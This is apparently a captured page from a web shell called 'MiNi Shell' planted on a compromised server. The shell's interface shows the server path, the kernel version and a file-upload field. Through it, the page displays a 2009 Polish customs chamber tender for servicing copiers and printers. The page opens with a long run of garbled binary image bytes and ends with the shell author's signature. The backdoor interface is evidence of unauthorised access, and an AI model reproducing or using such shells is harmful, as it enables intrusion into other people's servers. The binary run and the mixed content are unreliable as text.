JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/37402-N-2009.html

<p class="kh_header"><b>Gdynia: świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) urządzeń biurowych będących własnością Izby Celnej w Gdyni</b><br>
<b>Numer ogłoszenia: 37402 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Gdyni , ul. Północna 9A, 81-029 Gdynia, woj. pomorskie, tel. 058 6669088, faks 058 6669226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdynia.uc.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: służba celna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) urządzeń biurowych będących własnością Izby Celnej w Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	PRZEDMIOT ZAMÓWIENIA:

A. Przedmiotem zamówienia jest świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) urządzeń biurowych.
B. Szczegółowy opis przedmiotu zamówienia został określony 
w Załączniku Nr 1 do niniejszej Specyfikacji.
C. Szczegółowe wymagania odnośnie realizacji przedmiotu zamówienia okreslone zostały we wzorze umowy stanowiącym Załącznik Nr 2 
do niniejszej Specyfikacji.
D. Z wyłonionym Wykonawcą zostaną podpisane umowy na czas określony tj. 
- w zakresie kopiarek Toshiba 230 oraz Toshiba 450 od dnia podpisania umowy do dnia 08.09.2009r. 
- w zakresie drukarek Brother 5250 oraz HPLJ 3380 od dnia podpisania umowy do dnia 02.11.2009r.
- w zakresie kopiarek Kyocera 1620 od dnia 05.06.2009r. 
do dnia 08.09.2009r.

Załącznik Nr 1 - sprawa 2532-PN-2/09- opis przedmiotu zamówienia


I. Przedmiot zamówienia:

1.	Przedmiotem zamówienia jest świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) niżej wymienionych urządzeń biurowych.

WYKAZ URZĄDZEŃ BIUROWYCH OBJĘTYCH POSTĘPOWANIEM

Lp.	Rodzaj	Nr inwentarzowy	Typ	Ilość	Lokalizacja *
1.	Kopiarka	4-49-491-2-00295	Toshiba 450	1 szt.	Gdynia
2.	Kopiarka	4-49-491-2-00297	Toshiba 450	1 szt.	Gdańsk
3.	Kopiarka	4-49-491-2-00296	Toshiba 230	1 szt.	Gdynia
4.	Kopiarka	8-80-803-2-00107	Toshiba 230	1 szt.	Słupsk
5.	Kopiarka	8-80-803-2-00108	Toshiba 230	1 szt.	Gdynia
6.	Kopiarka	8-80-803-2-00093	Kyocera 1620	1 szt.	Gdynia
7.	Kopiarka	8-80-803-2-00094	Kyocera 1620	1 szt.	Gdynia
8.	Kopiarka	8-80-803-2-00095	Kyocera 1620	1 szt.	Gdynia
9.	Kopiarka	8-80-803-2-00096	Kyocera 1620	1 szt.	Gdynia
10.	Kopiarka	8-80-803-2-00097	Kyocera 1620	1 szt.	Gdynia
11.	Kopiarka	8-80-803-2-00098	Kyocera 1620	1 szt.	Gdynia
12.	Kopiarka	8-80-803-2-00099	Kyocera 1620	1 szt.	Gdynia
13.	Kopiarka	8-80-803-2-00100	Kyocera 1620	1 szt.	Gdynia
14.	Kopiarka	8-80-803-2-00101	Kyocera 1620	1 szt.	Gdynia
15.	Drukarka	4-49-491-2-00285	HPLJ 3380	1 szt.	Gdynia
16.	Drukarka	4-49-491-2-00286	HPLJ 3380	1 szt.	Gdynia
17.	Drukarka	4-49-491-2-00287	HPLJ 3380	1 szt.	Gdynia
18.	Drukarka	4-49-491-2-00288	HPLJ 3380	1 szt.	Gdynia
19.	Drukarka	4-49-491-2-00289	HPLJ 3380	1 szt.	Gdynia
20.	Drukarka	12-05-00029	Brother 5250	1 szt.	Gdynia
21.	Drukarka	12-05-00030	Brother 5250	1 szt.	Słupsk
22.	Drukarka	12-05-00031	Brother 5250	1 szt.	Słupsk
23.	Drukarka	12-05-00032	Brother 5250	1 szt.	Gdynia
24.	Drukarka	12-05-00033	Brother 5250	1 szt.	Gdynia
25.	Drukarka	12-05-00034	Brother 5250	1 szt.	Gdynia
26.	Drukarka	12-05-00035	Brother 5250	1 szt.	Gdynia
27.	Drukarka	12-05-00036	Brother 5250	1 szt.	Gdynia
28.	Drukarka	12-05-00037	Brother 5250	1 szt.	Gdańsk
29.	Drukarka	12-05-00038	Brother 5250	1 szt.	Gdynia
30.	Drukarka	12-05-00039	Brother 5250	1 szt.	Gdynia
31.	Drukarka	12-05-00040	Brother 5250	1 szt.	Gdynia
32.	Drukarka	12-05-00041	Brother 5250	1 szt.	Gdynia
33.	Drukarka	12-05-00042	Brother 5250	1 szt.	Gdynia
34.	Drukarka	12-05-00043	Brother 5250	1 szt.	Gdynia
35.	Drukarka	12-05-00044	Brother 5250	1 szt.	Gdynia
36.	Drukarka	12-05-00045	Brother 5250	1 szt.	Gdynia
37.	Drukarka	12-05-00046	Brother 5250	1 szt.	Gdynia
38.	Drukarka	12-05-00047	Brother 5250	1 szt.	Gdynia
39.	Drukarka	12-05-00048	Brother 5250	1 szt.	Gdańsk
40.	Drukarka	12-05-00071	Brother 5250	1 szt.	Gdynia
* podana w tabeli  lokalizacja sprzętu jest aktualna na dzień wszczęcia postępowania. Zamawiający zastrzega sobie prawo do zmiany lokalizacji ww. sprzętu w czasie trwania umowy.
2.	Serwis urządzeń winien obejmować:

A/ konserwację urządzenia wraz z RADF/ADF tj. - sprawdzenie 
i regulacja pracy urządzenia oraz przesmarowanie elementów ruchomych. Wyczyszczenie zespołów urządzenia,  wnętrza i obudowy.

B/ naprawę nw. zespołów:
- zespołu kserograficznego,
- zespołu napędu papieru,
- zespołu napędu głównego,
- zespołu napędu skanera,
- zespołu napędu optyki,
- zespołu utrwalania,
- zespołu transportu papieru,
- zespołu sterowania,
- zespołu wywoływania,
- zespołu dupleksu,
- zespołu RADF/ADF,
- zespołu sortera,
- zespołu LCC 

C/ naprawy nietypowe - nie wymienione w punkcie B

D/ dostawę i wymianę materiałów eksploatacyjnych:

-	bęben światłoczuły wraz z listwą czyszcząca bęben:
-	Toshiba 230
-	Toshiba 450
-	Kyocera 1620

-	deweloper 
-	Toshiba 230
-	Toshiba 450

E/ dostawę i wymianę części nietypowych

II. Wymagania dodatkowe:

A/ Wykonawca zapewnia dyspozycyjność - zlecenia realizowane będą zgodnie z potrzebami Zamawiającego, w miejscu użytkowania sprzętu.

B/ Wykonawca zobowiązany jest do zdiagnozowania przyczyn awarii, przedstawienia zakresu naprawy i jej kosztów w formie pisemnej w terminie 36 godzin, licząc od momentu otrzymania zawiadomienia przekazanego za pośrednictwem poczty elektronicznej, telefaksu.

C/ Wykonawca zobowiązany jest przystąpić i dokonać naprawy, konserwacji, wymiany materiałów eksploatacyjnych oraz części zamiennych w terminie 48 godzin, licząc od momentu otrzymania zlecenia przekazanego za pośrednictwem poczty elektronicznej, telefaksu.

D/ w przypadku, gdy czas naprawy będzie dłuższy niż 3 dni robocze licząc od dnia otrzymania zlecenia Wykonawca zobowiązany jest do dostarczenia urządzenia zastępczego o nie gorszych parametrach wraz ze sterownikami i instrukcją w języku polskim.

E/ Wykonawca zobowiązany jest do stosowania oryginalnych części zamiennych, oryginalnych materiałów eksploatacyjnych. Zamawiający dopuszcza możliwość stosowania części/materiałów równoważnych do oryginalnych, przy czym ich parametry nie mogą być gorsze od parametrów  części/materiałów oryginalnych. Obowiązek udokumentowania równoważności stosowanych części spoczywa na Wykonawcy.

F/ na wykonane prace Wykonawca zobowiązany jest do udzielenia min. 12 miesięcznej gwarancji.

G/ Do rozliczenia napraw i konserwacji ujętych w pkt. 2/A, 2/B, 2/C  opisu przedmiotu zamówienia ma zastosowanie stawka 1 roboczogodziny Wykonawcy. 

H/ Do rozliczania kosztów wymiany materiałów eksploatacyjnych ujętych 
w pkt 2/D opisu przedmiotu zamówienia stosuje się stawkę 1 roboczogodziny oraz cenę materiałów eksploatacyjnych zgodnie z ofertą Wykonawcy.

I/ Do rozliczania kosztów usługi wymiany części nietypowych zgodnie 
z pkt 2/E opisu przedmiotu zamówienia stosuje się stawkę 1 roboczogodziny Wykonawcy. Naliczanie kosztów zakupu części nietypowych przez Wykonawcę dla potrzeb Zamawiającego wykonuję się na podstawie faktury VAT dotyczącej zakupu części przez Wykonawcę oraz nalicza się marżę zgodnie z ofertą Wykonawcy. Wykonawca na prośbę Zamawiającego ma obowiązek niezwłocznego przesłania faktury VAT dotyczącej zakupu części do siedziby  Zamawiającego. (dopuszczalna jest możliwość przesłanie faktury za pośrednictwem poczty elektronicznej lub telefaksu) Naliczanie marży spoczywa po stronie Wykonawcy.

J/ za dojazd do miejsca lokalizacji sprzętu biurowego na terenie Trójmiasta, Wykonawcy nie przysługuje zwrot kosztów dojazdu niezależnie od lokalizacji siedziby Wykonawcy. W przypadku sprzętu biurowego usytuowanego w jednostkach organizacyjnych Zamawiającego  mających  siedzibę poza Trójmiastem, Wykonawcy przysługuje zwrot kosztów  dojazdu. Obliczenie wysokości kosztów dojazdu następuje poprzez przemnożenie stawki za 1 km przebiegu pojazdu  określonej w Dzienniku Ustaw przez ilość km.

Przyjmuje się następujące odległości do:
    - OC w Kwidzynie - 97 km
    - OC Starogard Gdański - 65 km
    - OC Starogard Gdański Miejsce Wyznaczone w Tczewie - 52 km
    - UC w Słupsku -  107 km
    - OC w Chojnicach - 120 km
    - OC w Ustce - 120 km
    - OC we Władysławowie - 38 km..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.	WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPOSÓB ICH SPEŁNIENIA:

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

4.1.	 złożą ofertę cenową zgodnie z Załącznikiem Nr 3 do SIWZ
4.2.	spełniają warunki określone w art. 22 ust. 1 ustawy PZP
4.3.	złożą oświadczenia i dokumenty wymagane przez Zamawiajacego

Sposób oceny:

Zamawiający dokona oceny spełnienia warunków stawianych Wykonawcą na podstawie wymaganych dokumentów, złożonych przez Wykonawcę wg. formuły: spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OŚWIADCZENIA LUB DOKUMENTY, JAKIE DOSTARCZYĆ MAJĄ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.

1.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22, ust. 1 ustawy Prawo zamówień publicznych, podpisane przez przedstawicieli Wykonawcy upoważnionych do reprezentowania firmy, zgodnie 
z Załącznikiem Nr 4 do niniejszej SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Imienny wykaz osób, które będą uczestniczyły w wykonywania zamówienia.
4.	Pełnomocnictwo w przypadku, gdy Wykonawca jest reprezentowany przez osobę inną niż określoną w dokumencie rejestracyjnym (ustanowienie pełnomocnika podlega opłacie skarbowej zgodnie z ustawą z dnia 16-11-2006 r. o opłacie skarbowej - Dz.U.Nr 225, poz. 1635 
z późn. zm).
5.	Kopie certyfikatów dystrybutora na obsługę kopiarek Toshiba 
i Kyocera oraz drukarek HPLJ oraz Brother.

Wszelkie dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (pieczęć firmowa lub czytelny podpis lub pieczęć imienna i nieczytelny podpis).

Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 20</li>
<li>2 - Stawka roboczogodziny - 65</li>
<li>3 - Marża za części nietypowe - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gdynia.uc.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Logistyki Izby Celnej w Gdyni, ul. Północna 9A, 81-029 Gdynia, pokój nr 352, od poniedziałku do piątku, w godz. 08:00 - 14:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 09:30, miejsce: Kancelaria Izby Celnej w Gdyni, ul. Północna 9A, 81-029 Gdynia, pokój nr 003.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com